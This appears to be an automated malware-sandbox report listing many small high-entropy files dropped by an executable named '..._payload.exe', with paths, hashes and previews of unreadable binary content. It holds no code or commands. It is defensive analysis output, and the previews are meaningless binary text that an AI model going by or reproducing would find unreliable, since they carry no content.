                                                                                                Preview:NWTVC.J.v,.0%.~..c....S...e.<..Vz....!.t..f|.H.'.......l./=..z......WD._.y.j..TU.W?'...:J{$.H...."....v~..0...@E...v....p..hb.,P........F......._..2/.....vf.H...:..D.d.(.G.aH=B..Fh.#iS.s..........{.w=.\..m..c..O..B....&V..w.H...0s;f'...|.=.....qE.c<.I.3.(b..B&.:.+G....".o.X..<..[..R..T.G.......m.#.b..e..<...t...!.V...j...S<.......eR6....P.s...u>.3....=.......@T..`~....A%a$.F=..p..Z.lO..U.t..g. |...X .l?gPR....G.oD...&v..<..V......... <.....m...Z(t.'T..}a...2....Pm.5.....YL}u.Q.I....[bGC.|x0.)P....tUm.Sn...+"3.`~.w.....T5d*r.j..b...0...w9=..%.....E.nb........G.....^V... ......3L7.~`q..W...K2...v.D...J....=..Oj...,..t.YN'....W..P........G.T..>@i.,[.........R.g..3@`!..j7P..<.ah0....!X.....pa..wp...q.t....`-.O.P.........'l..o..7.l`.cA..T.D;..>...Y.t.B....n...p..2#.c......_....+<..`0c.QL`.{x(....,...Jp.p*.....s{9:...z..L...+.....iR..'n.w..#\.p.l....:^.e. .}x/.A...;Q..O.......L...}.L.fH.J..D..M.G.Jw.I.}...K........2U<......I.z.6. .A.(.$.....a.^1
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.862669966458937
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:iFDOYmUjheX2rEkhbedY+R8bZGBBiauTIcpsK4SegQ1pYn3YEaRHHFN3eF5x3bD:iFDTfEkhbt++bZGeaaIIsKki3LuHlNOh
                                                                                                MD5:7D4E66472959BE2A466A65B761144463
                                                                                                SHA1:EEDD7DCF4473700072E6800AACA01AF78FF7A0ED
                                                                                                SHA-256:9E7384DA92F6826D35383F09080B7F9F88DF7F176A0F4CFCC60D5050D50F0506
                                                                                                SHA-512:E29EF62E7986ABB9C6786D5B442965B3CCDF0D395815095F7FD341BDE7B25D8AA9E997A017ED5ABC10067BBDBA2552559A0029D397E15DF77CD5CCD6F858A1B3
                                                                                                Malicious:false
                                                                                                Preview:NWTVC..`..Z..r...=..,72).U..:....\..T.F5.I.>.R....].............wCI...D.1...".+l?'...dP.k.s.(.qk.?.|......=...S=f.........K.b.....5......0..s..q< ..`..c...t~. ....6...<...@. 6.1...p....3...GeqV..&"v"..P.2(.d....$+.*..s"j.-vN...<j....A.J.=....M.4.....}.;..........k..........\..V.@.WZoo..R.R.......*..C.\....#rJ#(.@.'R..wS..i..p..Y.v{jk&k[.".]4j...V..j..D.e&c.q..:.xEE&.mIo.;........-...#?..."PVQ..>4..Pg.).Vtx..&...'.:../y..'.Ri.}..$*^-...g.31.[.....Y..O.u'.....O.!..B...^J..h.((....;....y...R....8.C.b.s.F{.N2g....}.F'.......l/.e.}.bZ..]..^.M..8...gH.%..<..#NSf......L._...r..)...r..v..ZG..*4.....%O.......\.?...O...v.:)..4...W.4....U.k...b..]'...z.&.....-.X.@..._......p.VZR<gxU+w/.7.$.....I...mk8..S.N..s.u..\Q.=..._w...:.._..~QG......nE.c].C.. '[...phx....3.....1....":._..]x.L.v.{..m.SBO).v.e_.......b.l..Eqhi..`".%..../z.c...L;..>...{Jh...V../]....0;..n< hg.H.p..ri....Z.Z[.....YFoC.j.r...>....F..D..~.Lm.R.g|..M.../..7+...."..s.X..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.824755173952534
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BOXRaFedd44YPW6ezCtu0hF0FXQEfr9aF/n4Zw8A4/E0ln3KV6zCppBD89Ukx3bD:BOMFeddvYPSIFhF0/T9aFf4OM/t3k6zh
                                                                                                MD5:F5024B64CDCB019878AD954C86F886E8
                                                                                                SHA1:B68AE17A07513D8EC3ED7E513AE98E483135F296
                                                                                                SHA-256:A66D2989A9C976095F71B5E6B7EFDBEA800E2EB3BD0CC086449C4367C79BD167
                                                                                                SHA-512:69E3DBED2433ADE028898C23C5024A17209759872D1B2C6602C1FD07BA5232372F1A14D193430F8E8241A3E6AF7D013792A2DBAC5E33EC574F6CCB895CF5C0B5
                                                                                                Malicious:false
                                                                                                Preview:OKWJN.Tt...")j...{...8.....W..g.A...+2.j+}._....VZn.>...Y...;h..q._......F...WA.s(.L,.}..{...._. %.......n(.,.u.\.o>......3..%\...Z|2...2J.Vj.......b.!#l...q'..J...F.....$.e..<..9Lrc....y.)f9l....q.4...V....y..<}....!.X$....|.A......J..bP.Pu.<.r..^...}.a..^.. .?B;.q......N.....uJX..U..9j;l..4..K.!..%.....w.....$...k.V.3s4i..../T...'8....z.....B].k.)/....>.k.=.h.J...x.Q.....Y...J.n.c.'....o.........S..f.........fc../....(....P..:(-..!.........U.U.K..{.B.X...z.=.)...T:.......X...Q..}.z.6.R.....[G.O^)k..bx....(....E..S..A...UFW..6..s..0..R...q~.`Ky.X.;.....s..#6BU........3O8.Nt..L%.o.t..{.4..K.....Z...P....<.;T..q..#%=....5*JZ..n<o.:Y~.6.%.:...-s..(x....8.e...l.bx...Ri..c.....v.....T........L3..<.9_.b...4-3....5.,.*.q>:yi..)4.|....;..+....2.t....Hi..kQ,*[....(....Q...GI.*l.34.U.......}j..I6..'..d.7h2.....0_.O.S...(..v0.}..w. k{......d7..RS....g..,*]....e......3.3J.%.....J..?..H.....M.n.-V..On......u....,....T....D..Y7wC.AAc..8..,~.h1H`
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.835647257737005
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:mNyrkfKzWhseE5WGo6RD+AoTXUwvroCycKSTlNIIsHj3jWk8ZehYEX7/Ex3bD:mxfKzW1EQGokDgNToC9VTDIIsDTZXsLD
                                                                                                MD5:EFD026E8178A46562A68E0A312F72D45
                                                                                                SHA1:C95228A519FBE73E24D4753E9C8EAD1BC2E7CBCC
                                                                                                SHA-256:1DBA6C7DD3737589B27791674A4284B7A7D59041532C673764C725A8E1E7AF0D
                                                                                                SHA-512:A7D37496EEAC0B16C991DCE5D415A03EA1893E3A9D7408479505DAB30936EE8CA2BB70DFC41D1FD2AA83B52300B8A9A9E2473E4AC59C9CEB2F9176C20BC4B8A9
                                                                                                Malicious:false
                                                                                                Preview:OVWVV...\...O5.a..@..*...E....!j.u....g/......~O.T........t.....@.ic#..#.%.N./#"i..* Se..Y.....{.g..`.s.4.{8..`.$.].......To.M..1.......O..........C.y......X.nw.N....h........B.J.LA.gY\..p.z..q..4..u.*.....-.}3{..x.e.34Q.5x.`.B.@....O...3........^RR.[.x....4.r....._h......~.#......R8...._...GV...N.X..F........]...X.....t.").W.&...f.`'p..k.v..&.......r..\.i2.......P.k...K.p....c.l.a.<0..u..w.rX..>.aT..1...O...Z..;u.#R..Cn.^F~vfP.}.5.....FY..a..6@Q..DwU..P..A.0 ..n..:.*...E....u].....YR.f..5I..M....=....2W......UG.F.L....J.1[..;$...@.....@.:...(3..>......{csO....G..4-B.8...%..I6<.F}...s.V-).Yk...*.......m.X...H.@.Q9...R0.....|o..*..T..nE.Mq...W{.u...e.B....X3.P.-lqB..'.{>...F.q..K...8l.w.1...\....@./......Q.R.<.S."mI[T.Q.o..zK.u1...%t.E.?.c...\,.U...R...].}?..B~..!..5q.d&..O{?.X...5N.,..4YL....E?.@Xj.Mn.d..v.3.........M5.5..X.....,(24.V....;..}u..P....)VL i.....h0......-...le.=~w|.:\'Yb...a.-....]s\.t.M...jY/".FOix.......+W.....j..h.v.[..1[....p.....n
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.844596990498227
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:3PfdVPjrLyHPXrmOqtzLUohMcN9cpPNM6HQeN2vS9fuE1PBu0C/t6AIab21ax3bD:3PfnHyHjmHZLUohpNqBDc0C/t6NfeLD
                                                                                                MD5:3705E715AB42C82C5C6BFF7E2CD79EDD
                                                                                                SHA1:F222901AD29795CCEAF3DCCF67FB0B137ECC66C0
                                                                                                SHA-256:930FB2A2933D161B082AAE14D144A48FF738250DB8F65090BF89BBB15E88C681
                                                                                                SHA-512:96A7D0AE2CDDE1AFBB6B7B3C659B89A51E2711BD5FD8807A45515BAD6FF8E21C92942DB1F16E762B97F79576623C7C787701B40F933F6B741EEC79CC031B8FEC
                                                                                                Malicious:false
                                                                                                Preview:SQRKH......=,.d.n.:xk...W0;^.qL.!..=..~..........;.Q../.X|NPq........R...C0/.'..cjq.i..N.F...rU.#.v..l.T>F...i....Z,R._.s....&j...x...H...H%L.~..f{..e..X.;S7r..a.;..K..U......6o.4.e.0....#.e./v,el..&..y..b>}.N.}.V.vB=...z~...C.E........L...P..`..U.....Y.../mJV..M).....Q.j.......^.iGa?.k.....^.^...T............kyRU..oy.&F{{?......%.......5.A.S..L,7...{.R....N.C.E.{ .I..;9._.T..G.\.1ML....X..hn.'.w.+ ..f....p...i*............5K..P..J#....`.>.@...F.=y..."H.C.....:...zv@q...Z..~.@.L?.Ua...j|4bj.\.+..iP......L.#.f..D.(..{m.*....C_.Y.JqCh%<.-.u#...r.1.b...A>..,.*A.*..7.....C...K..2B....+..2..\..P=.yt.W.PV....R..@JgY...t-.h..7..9n.!...Q...W.g....l ...w.b....H.=...-.E5.".#...A.;....S..LR...+kY..........X...PH.up...T..4P..tB...H'g.j.ZE.3...]B_.;..k.......80W....w........caB.....*w...>....t.f..\.&C..\.&Y.=l!.....(... 9....e..v..VGu.i.P..T-....|ps.kAW.....>....7.E..O.x..;.5K.u......ZE....Fq..e..G.}.E.y.....5.;....2.).....|..._...q...\
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.858773795322213
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ie+sSyP/qjcKMBHR/3wMOFmIcBNs+YDUGL43mDhXuglpzr+5Lm7f53duy9Sx3bD:Ua/AlMtR/NUFcBNU4QGiEWMLmf9mLD
                                                                                                MD5:F9FB24CBA0E29ACD4205D8A22332C378
                                                                                                SHA1:D247A93F76094C24A7C827D82679A635E4E744E3
                                                                                                SHA-256:BFD28DED0BC3AD36E97B747DA7CB5575321155C7941EAB6B26D8B947EFB71D04
                                                                                                SHA-512:EB729E2DAAB0A57A56438507E5EB45DAF9F32E631A1E386EC4D2547E93D60AF4B2329DB3C9B127609E8CD3DD34D1EF3FECA890C4C681388A6F162928B23624BE
                                                                                                Malicious:false
                                                                                                Preview:TWGTY......,+..c.....D...Q..8..U..?,./.^R......Z..C=....q..e9x.4v........HN...2.,.*....Y.M`..c.....(....Y......A?.......+|.s.Ip.'..c2.N.g[V.......KH.vS,..nr./Vg0*..&H)..f...y\LA...~......oXZj..._...9k.#.......{<.....h5.Zn.S...$>.9..<^k..O....I..ZQU..A8... w...@.?..W...e.'..M......C@..<1...Km..4S..'....9...E...Ha.........9S..t..u3.)...G..1...n.Zno8..@q......C.J".P.[...O.....7...0.`...3.k[Ze....).C....y..........h}..b;.F....'..:..Rl...+.O..*..wc.....h3. .I..e?kW.W.qR.........z....QtR.8y....^.......-u..;..+Y.|....sC.Y..=.@...vk;]w..tmD....e'.G..H...&sKJ;...e..p.....(.aX.x.......S,.!.*X F.h:j.0...OV..ELOxh.O...E.....;.5..Z.......j.s....J.K..uC......3.....&....g/..P.q...'..>..Z.....L.t.](2P..+.x..F.x.E....x..~.w..n.=.k. ..p|..4Jv..z..".....2!"..).W%.V.|..0.+..J.BN..)....9...t.!.k..<....1>..v.4ej...+`.......,..<..V....k8.D.Y ....S.vRYs.}y..`.x6...-..Q._..D#..>..~%...l...]]..4.....H._v...........o...=|.Uq\..:......B..xC..K.2\w....<.l....b...6.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.830890513640764
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BUlBQdjCJJ4ukDj3Zmvt6RN9cEA05ZnwiR76d+YKKjfzyTrTKbSt3r4jAZzlsSxn:VdZukXxvOEaZzyzbpD9/LD
                                                                                                MD5:2AE4137CBC772BD7F80B86FC2D5FBB7E
                                                                                                SHA1:3893BB9E7F51962CBA7A88B12CBE270A39360248
                                                                                                SHA-256:ACFCC4766D505568D4571CCB15AA566FDC5CF7EACD4829E6E7F6A25CAA4E9D3E
                                                                                                SHA-512:B696D0D90E863CE0D8F61551EF2DE35C372712E979CCF263571C9FA572B6E1256393A50202571866058678F7F8EB68CDAF759A634D03DA72A9D045CCD0F7517B
                                                                                                Malicious:false
                                                                                                Preview:UFTNO<|..N.............0.%b.... R..i.....]G...Vj...t.........4.f'.zMfK.).....]....N8.7.=...P.#.->...^.m..a.[..O;..{@.U......AP.&....y..G.g..jG..}. ......s.......w.2....p..:a..d..$#..Az...&x...Y.W..$...X....0E79........H..O.]x.t_.....p..6X..36.....So.`.........kb..c4.KQ..oV..{gvV..b.f;.>...'0...<...u........em....+/......../.d0r......8..1P..:u.G.[n..F......C..h.V0..9...;.e..R.X.F~.SN9f.....t.9....cz.6.m..V.e_0..bz.[g.Qm. .........n7..8h7d.,/..' .;S.ap-...1.|.p&.r.PCL2...5/.(...w./t.^.-.%.d.N}+.. .Je1....@!.B~.<O.Q...zAt....c.O..V.Yx..w.9......4........O...bJ.E..J........T.\*..%.$}\....mj.,".Q....x"|6..*"...>.t-..s...F.[.!=.=.rU}v..>.'.9...5.....6ty..4w..+.AP.%i..:J:A..x....P.J...&..pp'&....oAE..Q.....8.......~9i....:.j^...$../.".../i.3....'jc..b1...m.5qr T..b\./.oJ....d.R..@.R[.h..\F.T.).qG7...\7}.,.pC...ZU..?+.....I....z......x%..ig....b. .]......#..!%..}D...x[*u...rn...4...o...>..>..~D[*5.t.G.."..Y..*.6."......gR....d.I(4)./..2c.r...{ .\.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.857157075258451
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:lUJkoU62qalQM7Fw2Uvfrj4qX7IdnilOinifriwGVxyPOaf5kmmdvbx3bD:2s62TqhbJIdnX+ATIAff5k3vFLD
                                                                                                MD5:16152447553E39411EB5C89C89E91617
                                                                                                SHA1:EA5A11DE08D72FBFCC29E6F2BB5A109DB7786B24
                                                                                                SHA-256:45FE6FB8A613E1AEE3DD7FD48CC2DB08A7FBEE1017F18AD09F12183166C06BA4
                                                                                                SHA-512:DDDC19678BC1B66EB796AD49D7C5970F5C8C92DA8A73EE1DCFA202A91E0B5A183D38B088E0B7AC726A365E337F79960199F9F94DD4FE4BEAB88FFA45235CBCCA
                                                                                                Malicious:false
                                                                                                Preview:UMMBD.Y.!u...y...2..a.....>...........W.2..Z.8)...d.)\d..o-..K.6..jTL8..M@..&..q.X?....U..._.o ....~.....A./....{..}.p=.9.u.Sa....i..Qg..../..4`w4...),.=E.U.XA':....).k..1Z..1..d(.ZN....5...g..&..1y6.&..c..{-..)oi..CJho..%...RN..e..G..q...C.]..t.t..r,.,N..k....O.?......^...8se..R...t.7|L7e)T.{...Q].V.C.c...Ge.%D9o.._..s.T.*.!..4.{.......i...F.j.....8._.........f..D<K2l.....e...1C. ..^5...)..2..Ss.........>...X .p{`\e...dI....U..S.b.....4...6;...(.&fua.v%.P........M]1.[...?.#o.}...i..._.....s~........./U..;5D..K...Y4tjd.Cu.....h...O..j8...''...TP..@.n6.:.....y&.+.N...[....K.HuR.@....Q.4.T....J....Zt....0w...b...{..L.uM.Q ..........r%...|...l.S...$F.=X.%.B......F3..b.....q..1....P...y.....-...Ul...2H....p.LhZ...S'.V.n6...\.mS.A......un...*....2...`^.=..........s.X.%x}3V....a.~..\...Re...D...ZY..d...$#d|..7-. .L..A....?...A...U....9cV.k...YG.U..941.S>L.j.}.%.5..e~/.?*../....7C..lm#6.xr..Q.n..w.#..kDz._Hn................,....d....!.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.846325467202221
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:jE4ey+ge6kX+Lx9IucmvqAa0lwjbOaLVULl+RWc/qPxx3bD:o/X6kX+3IRj9al+wceLD
                                                                                                MD5:83214862BDCFC072E742A28C99B7873D
                                                                                                SHA1:C7C7D48CD183A203832C91D13AE0724B9419CF67
                                                                                                SHA-256:213D48F22505DFB0F7FBA42DA1C895AE881666B0D4D46020A6D2FBB8B62141C8
                                                                                                SHA-512:BEA42AA7207E9BF9678EDEB7C11A346D02158DDB55EE8FDFC5C67289D46BD978A3CC92A5406DDFF4CA8365E04BBC89799E502D0C77360517BC6E091A71285888
                                                                                                Malicious:false
                                                                                                Preview:XDPQCt.f..r.a.}...!,.E...r.{P.?kC...#..|.s..CJ.}.....M..J...G.|..jg..=..,.T.-....b.t..._..J..D..&...b.T.Z.a.)Lk.y2.#.....I.).[(.9.%i.$.D.%...J..&....u&.../.^..b..~]."X.mWQ..q......w.h..IAP.H.....L).o...B.#O.E6....1~......H..Q..m.......R$*..RF..V.......O.....#\....fG..7.^C......O.k..._..}6. .N..+.I..hp.. ...8.*2.j{...}..~.E...._.E...%.Oj..L.T.k...\..3W...r..o.G(.2..x....N?1...WI.)@Z..Z9in.C...l...-|J......x.;......;.'.}.w._.PX#..Eu..S.r..9DK....Tq.......z.,...U...(...J..n.-.y.,.......T..V.$..TI.!..W.z.H.SA.nx....e.......:sA.A.....(fMW..k_...U...0.../.o{..:.4.X.5Vo...s...d........S@....^!.&.c.p.C^.Z:.b.oi-.k..M.t~,(Fo....sT.Z.n..e2..E..-.i....7..Yp....@.<.._`..W..,I>'..F..N...T.?./1 ...ZfO.it$..Dy*c2KO..J~.{.n.......a~0.c..;A..B..T.Np...8.^z.....RkB..._..`..-...<..Z.yA......|..p.k.......!.."1.,Rl........S.`^bA..u..'%.=..7i'Kz......._FH..TH#...E.4..w@.....q...$."IM. [....f?.N......a].......j.'..GJ.....6..t.........H..z...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8313350920734175
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:KQPCB5QLUv/n41mbeyXSoy9ftZWsqaEPMFtDYSVlzYrhf0RtaBx3bD:3PDU344beyXSv9fGpkFtESfOmTabLD
                                                                                                MD5:364C67EB0AB1EF245F014679EA59736A
                                                                                                SHA1:B31DB4FE452FF4EB774355CBA42AA74D6D63F632
                                                                                                SHA-256:DB1E85CEA17B7E232D9D7B750B8BCFA7D898A7AC85363707FEF7538E7DBD7D09
                                                                                                SHA-512:3251AF39843E982AD7B2350C944DA8AA06D9BA3265A6640DA17FEC4B07DE99759224D52D3735BAD843E0B6872E2769511F5F7760E6CD3331AF49895CCC63CFAF
                                                                                                Malicious:false
                                                                                                Preview:YPSIA.}..rMV.7.u.D|..4s... ..O.....M..3}:.o$r....<...........!@..j.r......s[..8...S..84.G.y}.....y.JF.at..C._g+....9...-..'1%y..COu,....I...9.T.,.1...|..<.s_..go#:C......^.<...'.\......b...z..._x.......0.}...O...H....j4]..JI.R..Z.6_/....;.7..R..C(....h.v.AE.==.r...D.....q.)...h3...[..h..D.V.y.Sd..[.|.p.gW..K~.\...s5....Wb.nY.....@.7\N.JN. .G}..im3.......o.$....9...s....y$.1?3.5K.Y..&;.5..;ko=C]..dQ._...]t.#T......c...]....J+..".J....@....#S.X.+A..q......O..^7......LP.Y...6......JC .......q..i.f.U>Z..w...]..V=.Tc..@....{.V.9.b..-v..t..d....q.J,...........!.Vg.=.S.Q..QQ&y.B...7......qtx.T........cg@...Hv.|.1\hVlZ..tN.D...........(j.;.Z.5..AK.8v*.3.d...K_8PT...:L....lUT......2xE..MM.....g+E]."|T..!..aB....U._zg^...s..!Y.4.....Xo.E.|...Y5.Y.]A.............&.f&.Vk6_Jvp....l...J..:vJ..?.....s-q&:F.7e.U.....u.p.2k.q.....,B.0{.Vr......W....M.k...e._k......}.3D..J*.P~>.........).(..P....&N4C...y.-..c.M.w.|.P......=..LrE.V...\....+.....]$
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.843408661295608
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:upj+IJTRmv1Gk8z0ms5HUuxAdv4Whm1pldbUZsq5Xw9mz/wLT8Qx3bD:upJm1GcmqHNFFZUOP1LD
                                                                                                MD5:C10CF3EA32F5C5DAA2D39802C05FBD36
                                                                                                SHA1:6C1B0CBF705C4207ED223220DFC7A2F853F30003
                                                                                                SHA-256:6B1A30A26CF6EB9246AAD30DBE394DD626005E383BBA1ACE25C1C79E174276BB
                                                                                                SHA-512:E35C8BE10944000F91E6585F894CE5A66195E0A4FCBD8B13A1CB6B73196FBA11E8AA524525A226D12D02C7B29471C476EA8A70750F6ED558AE4FDA5AA14AA782
                                                                                                Malicious:false
                                                                                                Preview:YPSIA.<.oV..8..F..Cr....-?Z...9Zr$.:....,qD..9.......+..S.\P......z3..b.g..".....]".y.6.T..A.............l]5...E*.-..N..2.~..9.H.T..S....}o..)..,..ngg0..#.{..|h...(,.I.p+.&05........6..wrISI{..P...p..E........iH...'......'c.p.S...*.<.BG.f...(=B..m}..8"9...+.g.=..z..]..6..i..+..Z.*;.l8V..r..o...!^5..R7.eymZ....).*W.1..W..C..'^....u.r1.L.X8.q$.!.....G......h....U..$..Z.b..y ...&...,.D..;....f0m..l....... ...}..`...3eNwG.%^:HBP..{....y.L.^.U..D.k.&...iF.'".AM...4..5*;a+......aU..'f./.....^<o.8/..ec/.."$[.}......`.9....).?.<....n..B....rM .....@~..".}.:rol..).@=....d../.....;Q..qj.^.R'5..n....A.......>......o.B8.6..a....K...4...g..tnH....t..f6..t._..E.....O.jt....%_.....9h.7.........)....i .L..(..3,x..n.8o.o~.Qu.G"/N......HL9...B..g...A....L..<.>...#.$.....^...../<.J.4.C.jL[....~....V..h2.Yw5F.<q(jU..O....... ...-.....%....D.z....0.>........^..'...a..,.=...<...H.xyPE.'.%(..u..m..l=....dGi,bH..W.%;....#'g..5..$.....9.As...^...l...NG.M...W.d...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.845662909446342
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:IebkE4G+FhrOKXvK0cDLAzCD6dz8rSYtlYIIJAU4WV4g6x3bD:ICZ4F5OKXS0AE2DmGSYtyzv6g+LD
                                                                                                MD5:28D17148867DB8231CFFAD6B8629E4E4
                                                                                                SHA1:C128CA07A6C7ECA2D57711DBC390718252B5D77A
                                                                                                SHA-256:7E917A5C1DCC0CBE9B6B8E1E96CA7FDB526CDA36DD44A66FA07C707403D6E4B1
                                                                                                SHA-512:7C776B818CA5FF3D1FC6311EC6BE88A28CCDA0CD948123C88DC0FDD0FF21C3FCB0668DA8D16951A6CD2D61A22470D2C4D07FCE62F3F43B3FF8CB4DFE21D4EB66
                                                                                                Malicious:false
                                                                                                Preview:ZQIXMA...+}.!...CZ/..*n@.Y...G.Kv..?6I.7[.G....pPc.+.u...D.DSB..K...Y'.X..H..3.yX$...B....*.b...1.A..U..l>.K..i..Y..2...-:..EE/Uc..5.f.e......z....6....@#..Oc.T.....{.......e.cm....^.6dWE..!.o."h*M.$..j...y%...O0.&E.w.Y.. K.-..S...@z.....v......._a......`R;....A...<x.9^.8..So;.$Ja..F...Z....T...+...........e.o.V.>7.>.....\8o.Q1.T.Q....r).1a.F....:.&..h.1.U...r..L.iR...Oy2..])...6..Ju....Z......d.Cj.0.-.....q... .=lh?..J...y...d...A^.....E.u.|'...R......u.S].?A...qd.-N.....(........3{.{..u.\.....u..Q..:.M......a`(.7u^...!.......V...TY.2..|.........N<.u9.7.......u"J....3b. (.|q...%....y...l.d._q./C..C.I.Z).../..l.l....ebp...I.k..E........0..K;|.{u+..M......?(.V.U*..2...o..4..L...Yi...{t+....AI..^:[.x...du./.z..}luCg...Z....E.!..b.........W.4...i.<...P.u .*.oY..=..R.M..D.#d...UnH.DV.E#.#0..8...Lr.A..\.nZ. 8..E^...2.|..%....-(.M(..0&../[.u..^H.##..7.sh...I....,..k.~.Z~..(.^p,..md...?..H.....P.3n.u*....SI..S..w6...>.j.z...iw..5G...x.poI.Z}...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.871360666908529
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:+28C0kP39vYjz/I4Ml06rFdXAKeCCH8iW6JtnRw/xiiNRpS+NYSrlaq1ODyIx3bD:JvY//I4MlBd1ed8F6JtnwIGRQ+NBlaPn
                                                                                                MD5:89EB9A878F4BAE4C1E78CCF5833D95CE
                                                                                                SHA1:37F3BC2FB0F0B2CC20C7F3732897429A04FC2EE6
                                                                                                SHA-256:429C92FEE1F73F0B97D8F3FC936D887C1DB6D91C535DF045C705240C2B0368B8
                                                                                                SHA-512:8C6ACEDB9113712E043A1D4CF4B857F716793EE40ABE1E948EE7A1A0DC8455817119CE1EDA5215E04E085E03090C71041FE88054C542A49DAC3532B99873C96B
                                                                                                Malicious:false
                                                                                                Preview:ZQIXMg...ZYS...o.b...I;....Et....k`..&...........HX.F......kOFs.[.>:.Q(y...$.>].)K...Qb..K4..._.Z@=.....{. ...%X....d....Q.../..v^..M.?.y|...{q.R.3.0.5.u.$.......K..hHm...r.c...y....p.}4...(BW.wZU..D.a.$>..h7.V&...P/..y....T.4.~.../P......Y.C_.P9=.V...z(......="....[......]..c.o+*..i!:....c..7.r|V8..&Y?O.4...~.Z8.b.A...'..N.lF}.%.m...n...w..pv V...r.#G..F.E...j.zW/..>.........#7o...R.P...\h..Z..a.r6..~.d5..z.q..$..]......kul..p.~.......E....a.w..b\>U.".j^_3.T.&..~..|n)...n....'YXKe..q..IqJ\o.Y@T....nT.yk.\'r.......b.../.X......... {..Z.|L...,...7..D..C...3VW> ...u.^uB8/.li.5.a........)Ca.wn.#.~6{v(....<.:y..;x.g<...d......w.J,.>G".u...Q..;.`W0.d..'.'...e..fwH$Y...B......(..M....y.v....U..h.?`...S...aE...;X..8.k.~.x.........A........X..Y>..m|g.4w.hOX4.R.y.....r.W.P.?.K.V=..I......z...WO....?."...@}h3..Ak....kYq...O....q.B...h.&.$~-.....n..k`S.....xv<Dk.ll..n<.....l.J1..b.%.H......-iB..W.........-...f.8....`..z.......N..7f.?Wj...J1L.....5&.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.855335705377658
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:84RKm0rpsjAKRHOxVhKPNG+/kPZGqEWhvILMXZPdAHl4AwwstgdkPSuMx3bD:n0PrpyAo0hQRMBNpPdAH9kILD
                                                                                                MD5:FC7DC0115E4BA9334D64229BE5A2B44E
                                                                                                SHA1:D9DB1E8A0B07F40A0DC2C5F63460ADDA57A23532
                                                                                                SHA-256:0414D87D196390B96A7DF2707A16C423F8AA065D50FF8CF9E8C95A9CFBF1F09A
                                                                                                SHA-512:3B48E26DA8081ECBEFFB3CC10964AF9BADB174745E7B1F70DAC8D094BA817F54074B4FF711CC1857FB9BF2FF6FB1A05FE5C54E05F1722ED5D75B483D656B1DD5
                                                                                                Malicious:false
